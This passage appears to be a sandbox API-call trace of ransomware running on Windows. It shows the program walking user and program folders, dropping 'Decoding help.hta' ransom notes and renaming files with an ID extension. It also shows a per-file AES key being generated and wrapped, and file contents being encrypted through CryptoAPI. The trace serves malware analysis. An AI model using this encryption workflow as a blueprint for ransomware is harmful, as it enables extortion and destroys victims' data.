dwFileAttributes=0x1) returned 1 [0046.506] FindNextFileW (in: hFindFile=0x671570, lpFindFileData=0x15c1fd30 | out: lpFindFileData=0x15c1fd30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Adobe", cAlternateFileName="")) returned 1 [0046.506] lstrcmpW (lpString1=".", lpString2="Adobe") returned -1 [0046.506] lstrcmpW (lpString1="..", lpString2="Adobe") returned -1 [0046.506] lstrcmpiW (lpString1="windows", lpString2="Adobe") returned 1 [0046.506] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" [0046.506] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned 53 [0046.506] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Adobe" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe" [0046.506] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Adobe\\*.*" [0046.506] GlobalMemoryStatus (in: lpBuffer=0x15c1fd10 | out: lpBuffer=0x15c1fd10) [0046.506] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x9659e88, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x6e0 [0047.567] CloseHandle (hObject=0x6e0) returned 1 [0047.567] FindNextFileW (in: hFindFile=0x671570, lpFindFileData=0x15c1fd30 | out: lpFindFileData=0x15c1fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa19fc420, ftCreationTime.dwHighDateTime=0x1d4c917, ftLastAccessTime.dwLowDateTime=0xd224fcd0, ftLastAccessTime.dwHighDateTime=0x1d4d1a7, ftLastWriteTime.dwLowDateTime=0xd224fcd0, ftLastWriteTime.dwHighDateTime=0x1d4d1a7, nFileSizeHigh=0x0, nFileSizeLow=0x33ea, dwReserved0=0x0, dwReserved1=0x0, cFileName="AkPN9-5mHAwmPlgrfC4.flv", cAlternateFileName="AKPN9-~1.FLV")) returned 1 [0049.122] lstrcpyW (in: lpString1=0x989a7f8, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" [0049.123] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned 53 [0049.123] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decoding help.hta" [0049.123] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\decoding help.hta")) returned 0x1 [0049.123] lstrcmpiW (lpString1="Decoding help.hta", lpString2="AkPN9-5mHAwmPlgrfC4.flv") returned 1 [0049.123] lstrlenW (lpString="AkPN9-5mHAwmPlgrfC4.flv") returned 23 [0049.123] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" [0049.123] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned 53 [0049.123] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="AkPN9-5mHAwmPlgrfC4.flv" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AkPN9-5mHAwmPlgrfC4.flv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AkPN9-5mHAwmPlgrfC4.flv" [0049.123] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AkPN9-5mHAwmPlgrfC4.flv" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AkPN9-5mHAwmPlgrfC4.flv") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AkPN9-5mHAwmPlgrfC4.flv" [0049.123] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AkPN9-5mHAwmPlgrfC4.flv", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AkPN9-5mHAwmPlgrfC4.flv.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AkPN9-5mHAwmPlgrfC4.flv.[ID]g9uZrLhJaygpwRm1[ID]" [0049.123] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AkPN9-5mHAwmPlgrfC4.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\akpn9-5mhawmplgrfc4.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AkPN9-5mHAwmPlgrfC4.flv.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\akpn9-5mhawmplgrfc4.flv.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0051.016] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AkPN9-5mHAwmPlgrfC4.flv.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\akpn9-5mhawmplgrfc4.flv.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0051.016] CreateFileMappingA (hFile=0x540, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x394 [0051.017] CryptAcquireContextA (in: phProv=0x15c1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x15c1fcec*=0x34498a8) returned 1 [0054.618] CryptGenKey (in: hProv=0x34498a8, Algid=0x6610, dwFlags=0x1, phKey=0x15c1fce8 | out: phKey=0x15c1fce8*=0x671370) returned 1 [0054.618] CryptExportKey (in: hKey=0x671370, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x15c1fbe4, pdwDataLen=0x15c1fce4 | out: pbData=0x15c1fbe4*, pdwDataLen=0x15c1fce4*=0x2c) returned 1 [0054.618] MapViewOfFile (hFileMappingObject=0x394, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x33e0) returned 0x530000 [0054.619] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x15c1fbe4*, pdwDataLen=0x15c1fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x15c1fbe4*, pdwDataLen=0x15c1fcf8*=0x100) returned 1 [0054.620] CryptEncrypt (in: hKey=0x671370, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x530000*, pdwDataLen=0x15c1fce4*=0x33e0, dwBufLen=0x33e0 | out: pbData=0x530000*, pdwDataLen=0x15c1fce4*=0x33e0) returned 1 [0054.620] UnmapViewOfFile (lpBaseAddress=0x530000) returned 1 [0054.621] CloseHandle (hObject=0x394) returned 1 [0054.622] CryptDestroyKey (hKey=0x671370) returned 1 [0054.622] CryptReleaseContext (hProv=0x34498a8, dwFlags=0x0) returned 1 [0054.622] SetFilePointerEx (in: hFile=0x540, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0054.622] WriteFile (in: hFile=0x540, lpBuffer=0x15c1fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x15c1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x15c1fbe4*, lpNumberOfBytesWritten=0x15c1fcf8*=0x100, lpOverlapped=0x0) returned 1 [0056.933] WriteFile (in: hFile=0x540, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x15c1fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x15c1fcf8*=0x500, lpOverlapped=0x0) returned 1 [0056.933] CloseHandle (hObject=0x540) returned 1 [0056.933] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\AkPN9-5mHAwmPlgrfC4.flv.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0058.452] FindNextFileW (in: hFindFile=0x671570, lpFindFileData=0x15c1fd30 | out: lpFindFileData=0x15c1fd30*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6c4e7bf0, ftCreationTime.dwHighDateTime=0x1d4d0c3, ftLastAccessTime.dwLowDateTime=0x629fb1c0, ftLastAccessTime.dwHighDateTime=0x1d4ca59, ftLastWriteTime.dwLowDateTime=0x629fb1c0, ftLastWriteTime.dwHighDateTime=0x1d4ca59, nFileSizeHigh=0x0, nFileSizeLow=0xcab1, dwReserved0=0x0, dwReserved1=0x0, cFileName="BUeo.wav", cAlternateFileName="")) returned 1 [0058.452] lstrcpyW (in: lpString1=0x2a820628, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" [0058.452] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned 53 [0058.452] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decoding help.hta") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decoding help.hta" [0058.452] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Decoding help.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\decoding help.hta")) returned 0x1 [0058.452] lstrcmpiW (lpString1="Decoding help.hta", lpString2="BUeo.wav") returned 1 [0058.452] lstrlenW (lpString="BUeo.wav") returned 8 [0058.453] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*" [0058.453] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\*.*") returned 53 [0058.453] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="BUeo.wav" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BUeo.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BUeo.wav" [0058.453] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BUeo.wav" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BUeo.wav") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BUeo.wav" [0058.453] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BUeo.wav", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BUeo.wav.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BUeo.wav.[ID]g9uZrLhJaygpwRm1[ID]" [0058.453] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BUeo.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\bueo.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BUeo.wav.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\bueo.wav.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0058.454] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BUeo.wav.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\bueo.wav.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x540 [0058.454] CreateFileMappingA (hFile=0x540, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xc74 [0058.454] CryptAcquireContextA (in: phProv=0x15c1fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x15c1fcec*=0x2aac6660) returned 1 [0060.220] CryptGenKey (in: hProv=0x2aac6660, Algid=0x6610, dwFlags=0x1, phKey=0x15c1fce8 | out: phKey=0x15c1fce8*=0x10f142c0) returned 1 [0060.220] CryptExportKey (in: hKey=0x10f142c0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x15c1fbe4, pdwDataLen=0x15c1fce4 | out: pbData=0x15c1fbe4*, pdwDataLen=0x15c1fce4*=0x2c) returned 1 [0060.220] MapViewOfFile (hFileMappingObject=0xc74, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcaa0) Thread: id = 315 os_tid = 0x274 [0042.511] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\*.*", lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7438c420, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x762ca4e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x762ca4e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6715b0 [0042.512] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0042.512] FindNextFileW (in: hFindFile=0x6715b0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7438c420, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x762ca4e0, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x762ca4e0, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0042.517] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0042.517] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0042.517] FindNextFileW (in: hFindFile=0x6715b0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x743b2580, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x743b2580, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x743b2580, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x11e7a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="awt.dll", cAlternateFileName="")) returned 1 [0042.682] lstrcpyW (in: lpString1=0x11173c18, lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\*.*" [0042.682] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\*.*") returned 44 [0042.682] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\Decoding help.hta" [0042.682] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\Decoding help.hta" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\decoding help.hta")) returned 0xffffffff [0042.683] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\Decoding help.hta" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6ec [0042.686] WriteFile (in: hFile=0x6ec, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2f8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2f8fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0042.687] CloseHandle (hObject=0x6ec) returned 1 [0042.687] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0042.687] lstrcmpiW (lpString1="Decoding help.hta", lpString2="awt.dll") returned 1 [0042.687] lstrlenW (lpString="awt.dll") returned 7 [0042.687] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\*.*" [0042.687] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\*.*") returned 44 [0042.687] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\", lpString2="awt.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\awt.dll") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\awt.dll" [0042.687] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\awt.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\awt.dll") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\awt.dll" [0042.688] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\awt.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\awt.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\awt.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0042.688] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\awt.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\awt.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\awt.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\awt.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0042.708] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\awt.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\awt.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x680 [0042.708] CreateFileMappingA (hFile=0x680, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x678 [0042.708] CryptAcquireContextA (in: phProv=0x2f8fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2f8fcec*=0x3448f18) returned 1 [0046.678] CryptGenKey (in: hProv=0x3448f18, Algid=0x6610, dwFlags=0x1, phKey=0x2f8fce8 | out: phKey=0x2f8fce8*=0x671670) returned 1 [0046.678] CryptExportKey (in: hKey=0x671670, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2f8fbe4, pdwDataLen=0x2f8fce4 | out: pbData=0x2f8fbe4*, pdwDataLen=0x2f8fce4*=0x2c) returned 1 [0046.678] MapViewOfFile (hFileMappingObject=0x678, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x100000) returned 0xe210000 [0046.786] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f8fbe4*, pdwDataLen=0x2f8fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x2f8fbe4*, pdwDataLen=0x2f8fcf8*=0x100) returned 1 [0046.786] CryptEncrypt (in: hKey=0x671670, hHash=0x0, Final=0, dwFlags=0x0, pbData=0xe210000, pdwDataLen=0x2f8fce4*=0x100000, dwBufLen=0x100000 | out: pbData=0xe210000*, pdwDataLen=0x2f8fce4*=0x100000) returned 1 [0048.194] UnmapViewOfFile (lpBaseAddress=0xe210000) returned 1 [0048.381] CloseHandle (hObject=0x678) returned 1 [0048.381] CryptDestroyKey (hKey=0x671670) returned 1 [0048.381] CryptReleaseContext (hProv=0x3448f18, dwFlags=0x0) returned 1 [0048.381] SetFilePointerEx (in: hFile=0x680, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0048.381] WriteFile (in: hFile=0x680, lpBuffer=0x2f8fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x2f8fbe4*, lpNumberOfBytesWritten=0x2f8fcf8*=0x100, lpOverlapped=0x0) returned 1 [0050.037] WriteFile (in: hFile=0x680, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2f8fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x2f8fcf8*=0x500, lpOverlapped=0x0) returned 1 [0050.037] CloseHandle (hObject=0x680) returned 1 [0051.565] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\awt.dll.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0055.278] FindNextFileW (in: hFindFile=0x6715b0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x743b2580, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x743b2580, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x743b2580, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x255a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="axbridge.dll", cAlternateFileName="")) returned 1 [0055.278] lstrcpyW (in: lpString1=0x10fcf5c8, lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\*.*" [0055.278] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\*.*") returned 44 [0055.278] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\Decoding help.hta" [0055.278] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\Decoding help.hta" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\decoding help.hta")) returned 0x1 [0055.278] lstrcmpiW (lpString1="Decoding help.hta", lpString2="axbridge.dll") returned 1 [0055.278] lstrlenW (lpString="axbridge.dll") returned 12 [0055.278] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\*.*" [0055.278] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\*.*") returned 44 [0055.278] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\", lpString2="axbridge.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\axbridge.dll") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\axbridge.dll" [0055.278] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\axbridge.dll" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\axbridge.dll") returned="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\axbridge.dll" [0055.278] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\axbridge.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\axbridge.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files 